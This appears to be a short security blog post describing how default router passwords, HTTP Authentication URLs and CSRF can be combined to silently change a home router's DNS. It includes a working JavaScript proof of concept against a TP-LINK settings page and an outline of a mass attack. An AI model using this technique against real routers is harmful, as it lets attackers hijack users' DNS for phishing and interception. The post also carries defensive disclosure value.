First, let's briefly describe what HTTP Authentication is. The server returns a 401 status together with a WWW-Authenticate header.
The WWW-Authenticate header describes the HTTP Authentication prompt box.
The user enters the user name and password in the prompt box, and the browser puts them, base64-encoded, into the Authorization header of the request it sends:
YWRtaW46YWRtaW4= is the base64 encoding of admin:admin
In fact, all browsers used to support accessing and logging in through an HTTP Authentication URL, that is:
http://user:password@url
To prevent phishing URLs, Microsoft released a security patch that disables HTTP Authentication URLs in IE. For details, see
http://support.microsoft.com/kb/834489
With that background out of the way, let's look at some earlier cases. In the past few years I have seen several overseas cases of routers being attacked. Among them, the Flash UPnP attack was a wonderful one: it mapped a port of a specified intranet IP address to the outside so that it could be attacked. Of course, some router vulnerabilities can also expose the router's web management port for attack. Flash later fixed that vulnerability.
Back to the topic. We know that most domestic home routers use HTTP Authentication, TP-LINK routers for example. Although IE disables HTTP Authentication URLs, Firefox, Chrome and other browsers still support them. At the same time, embedding an HTTP Authentication URL in a tag forces a successful HTTP Authentication without any security prompt. So an evil attack method emerges:
1. Use the default IP addresses and default passwords of the various routers sold in China to construct an HTTP Authentication URL brute-force login script.
2. Use CSRF to modify the router's DNS settings and point them at our malicious DNS server.
For example, the following TP-LINK demo:
<script>
function dns() {
  alert('I have changed your dns on my domain!');
  // Loading the image sends a GET to the router's DHCP settings page;
  // the browser attaches the cached HTTP Authentication credentials.
  var i = new Image();
  i.src = 'http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6';
}
</script>
After tplink.html is opened, the router's DNS server has quietly been set to 8.8.8.8!
How could a hacker use this to launch a large-scale attack, silently changing the DNS of tens of thousands of routers?
This is a common security issue. Have you changed the default password of your router? Fortunately, only Firefox, Chrome and other such browsers have this security issue.
From: RAyh4c Black Box